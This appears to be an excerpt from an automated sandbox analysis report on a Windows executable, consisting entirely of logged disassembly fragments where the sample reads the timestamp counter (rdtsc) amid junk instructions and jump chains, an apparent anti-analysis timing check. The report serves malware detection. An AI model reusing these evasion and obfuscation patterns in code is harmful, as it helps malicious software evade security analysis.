                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10408C7 second address: 10408E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 pushad 0x00000009 jmp 00007F664452DADDh 0x0000000e jbe 00007F664452DADCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10408E5 second address: 1040926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007F6644F246F3h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 jns 00007F6644F246ECh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6644F246F4h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1040926 second address: 1040966 instructions: 0x00000000 rdtsc 0x00000002 js 00007F664452DAD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop eax 0x0000000c or dword ptr [ebp+122D1A0Ah], edi 0x00000012 lea ebx, dword ptr [ebp+1245C516h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F664452DAD8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 xchg eax, ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1040966 second address: 104096C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 104096C second address: 1040971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10409E8 second address: 10409EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10409EC second address: 10409F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10409F6 second address: 10409FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1040AD6 second address: 1040B02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push ebx 0x0000000d jnl 00007F664452DAD6h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1040B02 second address: 1040B5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jmp 00007F6644F246F8h 0x00000011 jmp 00007F6644F246F0h 0x00000016 popad 0x00000017 pop eax 0x00000018 jmp 00007F6644F246F1h 0x0000001d lea ebx, dword ptr [ebp+1245C521h] 0x00000023 add dword ptr [ebp+122D2DCAh], ebx 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1040B5A second address: 1040B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F664452DADBh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 105F164 second address: 105F16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 105F44A second address: 105F44E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 105F44E second address: 105F454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 105F705 second address: 105F70A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 105F70A second address: 105F710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1056011 second address: 1056048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F664452DAEBh 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jnc 00007F664452DAD6h 0x0000001b jc 00007F664452DAD6h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10365FC second address: 1036600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10600DC second address: 10600E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10606A1 second address: 10606A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1060978 second address: 106097D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106097D second address: 1060995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6644F246EFh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1060995 second address: 106099F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F664452DAD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1062FFA second address: 106300C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F6644F246ECh 0x0000000c js 00007F6644F246E6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106300C second address: 1063028 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F664452DAD6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10644C5 second address: 10644CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10644CB second address: 10644D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102FA06 second address: 102FA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102FA0C second address: 102FA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106979E second address: 10697C2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6644F246E8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007F6644F246F3h 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1069BC8 second address: 1069BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1069BCC second address: 1069BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106B24C second address: 106B252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106B252 second address: 106B256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106B256 second address: 106B28C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F664452DADCh 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F664452DADCh 0x00000018 jg 00007F664452DAD6h 0x0000001e jmp 00007F664452DADAh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102C21B second address: 102C221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102C221 second address: 102C225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106ECE4 second address: 106ECEE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6644F246ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106EE2E second address: 106EE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jl 00007F664452DAD6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106EE3C second address: 106EE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6644F246ECh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106EE50 second address: 106EE5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F664452DAD6h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106F277 second address: 106F286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106F3A4 second address: 106F3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F664452DADDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106F3B7 second address: 106F3C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6644F246E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106F3C6 second address: 106F3CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1071B5A second address: 1071B70 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F6644F246E6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F6644F246E6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1071E57 second address: 1071E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F664452DAD6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1072071 second address: 1072075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1072075 second address: 107208C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jbe 00007F664452DAD6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107208C second address: 1072090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1072090 second address: 1072094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1072778 second address: 1072794 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6644F246F2h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1072DBD second address: 1072DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1072DC1 second address: 1072E19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6644F246F6h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F6644F246E8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c xchg eax, ebx 0x0000002d push ebx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1073345 second address: 1073349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1073BAC second address: 1073BC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F6644F246E6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1073BC1 second address: 1073BCB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F664452DAD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1073BCB second address: 1073BD0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1077743 second address: 1077749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1078202 second address: 1078206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1077FEF second address: 1077FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1077FF3 second address: 1077FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1078C8C second address: 1078C92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1077FF7 second address: 1077FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107B408 second address: 107B445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F664452DAE1h 0x00000011 pop edx 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F664452DAE0h 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102DD61 second address: 102DD90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 ja 00007F6644F246E6h 0x0000000b popad 0x0000000c jmp 00007F6644F246ECh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6644F246F1h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1079EFF second address: 1079F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F664452DAD6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102DD90 second address: 102DDAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102DDAE second address: 102DDB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102DDB4 second address: 102DDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107E7BE second address: 107E836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F664452DADEh 0x00000010 pop edx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F664452DAD8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov bh, cl 0x0000002e push 00000000h 0x00000030 jbe 00007F664452DADBh 0x00000036 sbb bx, BB63h 0x0000003b push 00000000h 0x0000003d jmp 00007F664452DAE5h 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107D86C second address: 107D872 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107D872 second address: 107D878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107D878 second address: 107D87C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107E9E6 second address: 107E9EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107F989 second address: 107F98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107E9EA second address: 107EA8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 jc 00007F664452DAEDh 0x0000000e jmp 00007F664452DAE7h 0x00000013 pop ecx 0x00000014 nop 0x00000015 mov ebx, dword ptr [ebp+1245CAC6h] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 movzx ebx, di 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c ja 00007F664452DADBh 0x00000032 mov ebx, 16E1258Fh 0x00000037 adc bx, 8F38h 0x0000003c mov eax, dword ptr [ebp+122D0E49h] 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007F664452DAD8h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 00000015h 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c mov dword ptr [ebp+1245CAC1h], ebx 0x00000062 push FFFFFFFFh 0x00000064 call 00007F664452DAE6h 0x00000069 add ebx, 19B7235Eh 0x0000006f pop edi 0x00000070 nop 0x00000071 push esi 0x00000072 push eax 0x00000073 push edx 0x00000074 jp 00007F664452DAD6h 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1082B20 second address: 1082B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1082B24 second address: 1082B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1082B2A second address: 1082B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6644F246F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1082CD3 second address: 1082CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1083A86 second address: 1083A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1082CD7 second address: 1082CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 108495E second address: 1084962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1083A8B second address: 1083A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1082CDB second address: 1082CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1084962 second address: 1084988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D2ABAh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 cld 0x00000015 xchg eax, esi 0x00000016 jmp 00007F664452DADAh 0x0000001b push eax 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1083A91 second address: 1083A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
